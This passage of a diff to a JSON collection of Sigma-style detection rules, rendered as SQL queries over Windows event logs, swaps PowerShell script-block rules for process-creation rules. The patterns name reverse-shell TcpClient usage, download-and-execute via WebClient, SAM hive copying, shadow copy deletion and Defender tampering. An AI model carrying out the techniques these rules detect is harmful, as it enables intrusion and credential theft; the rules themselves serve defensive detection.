Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" ], - "filename": "posh_ps_wmimplant.yml" + "filename": "proc_creation_win_lolbin_pcwutl.yml" }, { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management 
tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "Detected Windows Software Discovery - PowerShell", - "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", - "status": "experimental", - "description": "Adversaries may attempt to 
enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "author": "Nikita Nazarov, oscd.community", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", + "status": "test", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate administration activities" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_sam_access.yml" + }, + { + "title": "Suspicious SYSVOL Domain Group Policy Access", + "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "status": "test", + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ], + "falsepositives": [ + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-object%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\policies\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_software_discovery.yml" + "filename": "proc_creation_win_susp_sysvol_access.yml" }, { - "title": "Suspicious New-PSDrive to Admin Share", - "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "title": "DriverQuery.EXE Execution", + "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", "status": "experimental", - "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.discovery" ], "falsepositives": [ - "Unknown" + "Legitimate use by third party tools in order to investigate installed drivers" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" ], - "filename": "posh_ps_susp_new_psdrive.yml" + "filename": "proc_creation_win_driverquery_usage.yml" }, { - "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": 
"e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": 
"Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Fsutil Suspicious Invocation", + "id": "add64136-62e5-48ea-807e-88638d02df1e", + "status": "stable", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. Anhaus, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Powershell Store File In Alternate Data Stream", - "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", "status": "test", - "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", - "author": "frack113", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE 
'%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_ps_store_file_in_alternate_data_stream.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Recon Information for Export with PowerShell", - "id": "a9723fcc-881c-424c-8709-fd61442ab3c3", - "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", - "author": "frack113", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", + "status": "experimental", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE 
'%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_ps_susp_recon_export.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "Suspicious Scan Loop Network", + "id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.004", "attack.execution", - "attack.t1059.001" + "attack.t1059", + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_susp_network_scan_loop.yml" }, { - "title": "PowerShell Deleted Mounted Share", - "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "title": "Remote PowerShell Session Host Process (WinRM)", + "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", "status": "test", - "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1070.005" + "attack.execution", + "attack.t1059.001", + "attack.t1021.006" ], "falsepositives": [ - "Administrators or Power users may remove their shares via cmd line" + "Legitimate usage of remote Powershell, e.g. for monitoring purposes." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mounted_share_deletion.yml" + "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + 
"attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "title": "Arbitrary MSI Download Via Devinit.EXE", + "id": "90d50722-0483-4065-8e35-57efaadd354d", "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects a certain command line flag combination used by \"devinit.exe\", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 
'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_devinit_lolbin_usage.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "title": "Remote Access Tool - ScreenConnect Execution", + "id": "57bff678-25d1-4d6c-8211-8ca106d12053", + "status": "test", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Legitimate usage of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" ], - "filename": "posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", - "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", - "status": "experimental", - "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "title": "Java Running with Remote Debugging", + "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "status": "test", + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.t1203", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE '%join%' ESCAPE '\\' OR 
HostApplication LIKE '%char%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" ], - "filename": "posh_pc_xor_commandline.yml" + "filename": "proc_creation_win_java_remote_debugging.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": "Suspicious PowerShell Parent Process", + "id": "754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Other scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "Suspicious PowerShell Download", - "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", + "title": "Suspicious Recursive Takeown", + "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "PowerShell scripts that download 
content from the Internet" + "Scripts created by developers and admins", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\' AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" ], - "filename": "posh_pc_susp_download.yml" + "filename": "proc_creation_win_takeown_recursive_own.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", - "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", - "author": "frack113", + "title": "TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "status": "test", + "description": "Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE 